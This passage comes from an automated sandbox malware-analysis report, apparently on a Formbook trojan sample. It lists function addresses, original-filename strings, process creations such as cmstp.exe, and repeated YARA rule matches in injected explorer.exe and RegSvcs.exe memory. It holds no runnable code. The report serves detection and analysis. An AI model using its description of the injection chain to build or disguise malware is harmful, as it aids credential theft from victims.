Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 12_2_0781432F	12_2_0781432F
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 12_2_0781E1B8	12_2_0781E1B8
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 12_2_0781E1C8	12_2_0781E1C8
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 12_2_0781D1EF	12_2_0781D1EF
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 12_2_0781DD70	12_2_0781DD70
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 12_2_078169A0	12_2_078169A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05440535	13_2_05440535
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05500591	13_2_05500591
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054F2446	13_2_054F2446
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054E4420	13_2_054E4420
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054EE4F6	13_2_054EE4F6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05464750	13_2_05464750
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05440770	13_2_05440770
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0543C7C0	13_2_0543C7C0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0545C6E0	13_2_0545C6E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054C8158	13_2_054C8158
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05430100	13_2_05430100
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054DA118	13_2_054DA118
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054F81CC	13_2_054F81CC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054F41A2	13_2_054F41A2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_055001AA	13_2_055001AA
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054D2000	13_2_054D2000
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054FA352	13_2_054FA352
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0544E3F0	13_2_0544E3F0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_055003E6	13_2_055003E6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054E0274	13_2_054E0274
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054C02C0	13_2_054C02C0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0544AD00	13_2_0544AD00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054DCD1F	13_2_054DCD1F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0543ADE0	13_2_0543ADE0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05458DBF	13_2_05458DBF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05440C00	13_2_05440C00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05430CF2	13_2_05430CF2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054E0CB5	13_2_054E0CB5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054B4F40	13_2_054B4F40
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05482F28	13_2_05482F28
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05460F30	13_2_05460F30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054E2F30	13_2_054E2F30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05432FC8	13_2_05432FC8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0544CFE0	13_2_0544CFE0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054BEFA0	13_2_054BEFA0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05440E59	13_2_05440E59
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054FEE26	13_2_054FEE26
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054FEEDB	13_2_054FEEDB
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05452E90	13_2_05452E90
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054FCE93	13_2_054FCE93
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05456962	13_2_05456962
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054429A0	13_2_054429A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0550A9A6	13_2_0550A9A6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0544A840	13_2_0544A840
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05442840	13_2_05442840
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0546E8F0	13_2_0546E8F0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054268B8	13_2_054268B8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054FAB40	13_2_054FAB40
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054F6BD7	13_2_054F6BD7
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0543EA80	13_2_0543EA80
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054F7571	13_2_054F7571
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_055095C3	13_2_055095C3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054DD5B0	13_2_054DD5B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05431460	13_2_05431460
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054FF43F	13_2_054FF43F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054FF7B0	13_2_054FF7B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05485630	13_2_05485630
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054F16CC	13_2_054F16CC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0547516C	13_2_0547516C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0542F172	13_2_0542F172
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0550B16B	13_2_0550B16B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0544B1B0	13_2_0544B1B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054EF0CC	13_2_054EF0CC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054470C0	13_2_054470C0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054F70E9	13_2_054F70E9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054FF0E0	13_2_054FF0E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0542D34C	13_2_0542D34C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054F132D	13_2_054F132D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0548739A	13_2_0548739A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0545B2C0	13_2_0545B2C0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054E12ED	13_2_054E12ED
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054452A0	13_2_054452A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05443D40	13_2_05443D40
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054F1D5A	13_2_054F1D5A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054F7D73	13_2_054F7D73
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0545FDC0	13_2_0545FDC0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054B9C32	13_2_054B9C32
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054FFCF2	13_2_054FFCF2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054FFF09	13_2_054FFF09
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05403FD2	13_2_05403FD2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05403FD5	13_2_05403FD5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05441F92	13_2_05441F92
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054FFFB1	13_2_054FFFB1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05449EB0	13_2_05449EB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05449950	13_2_05449950
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0545B950	13_2_0545B950
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054D5910	13_2_054D5910
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054AD800	13_2_054AD800
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054438E0	13_2_054438E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054FFB76	13_2_054FFB76
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054B5BF0	13_2_054B5BF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0547DBF9	13_2_0547DBF9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0545FB80	13_2_0545FB80
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054FFA49	13_2_054FFA49
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054F7A46	13_2_054F7A46
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054B3A6C	13_2_054B3A6C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054EDAC6	13_2_054EDAC6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054DDAAC	13_2_054DDAAC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05485AA0	13_2_05485AA0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054E1AA3	13_2_054E1AA3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0330E561	13_2_0330E561
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0330D566	13_2_0330D566
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0330EBCE	13_2_0330EBCE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0330D8FF	13_2_0330D8FF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_032F2FB0	13_2_032F2FB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_032F9E4B	13_2_032F9E4B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_032F9E50	13_2_032F9E50
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_032F2D94	13_2_032F2D94
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_032F2D90	13_2_032F2D90
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0514A036	13_2_0514A036
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05142D02	13_2_05142D02
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0514E5CD	13_2_0514E5CD
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05148912	13_2_05148912
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05141082	13_2_05141082
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05145B30	13_2_05145B30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05145B32	13_2_05145B32
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0514B232	13_2_0514B232

Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 05487E54 appears 111 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 054AEA12 appears 86 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 0542B970 appears 277 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 054BF290 appears 105 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 05475130 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01967E54 appears 102 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0198EA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0190B970 appears 277 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01955130 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0199F290 appears 105 times

Source: 890983726372673.exe	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: mZanCtInfW.exe.1.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: 890983726372673.exe, 00000001.00000002.1348081763.00000000044C3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs 890983726372673.exe
Source: 890983726372673.exe, 00000001.00000000.1281979826.00000000007C4000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenamemxDW.exeB vs 890983726372673.exe
Source: 890983726372673.exe, 00000001.00000002.1353167813.00000000074E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs 890983726372673.exe
Source: 890983726372673.exe, 00000001.00000002.1351066283.0000000005420000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs 890983726372673.exe
Source: 890983726372673.exe, 00000001.00000002.1348081763.0000000003CA4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs 890983726372673.exe
Source: 890983726372673.exe, 00000001.00000002.1344890225.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 890983726372673.exe
Source: 890983726372673.exe, 00000001.00000002.1352154575.000000000737B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs 890983726372673.exe
Source: 890983726372673.exe	Binary or memory string: OriginalFilenamemxDW.exeB vs 890983726372673.exe

Source: 890983726372673.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"			Jump to behavior

Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.1415492668.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.1415492668.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.1415492668.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.1348081763.00000000047C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1348081763.00000000047C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.1348081763.00000000047C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.1384995064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.1384995064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.1384995064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.1415492668.0000000004C8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.1415492668.0000000004C8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.1415492668.0000000004C8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.1416948989.0000000002510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.1416948989.0000000002510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.1416948989.0000000002510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.2544683855.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.2544683855.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.2544683855.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.2545503031.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.2545503031.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.2545503031.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.2562036289.0000000010545000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 0000000D.00000002.2545426504.00000000036F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.2545426504.00000000036F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.2545426504.00000000036F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: 890983726372673.exe PID: 3180, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7180, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: mZanCtInfW.exe PID: 7364, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
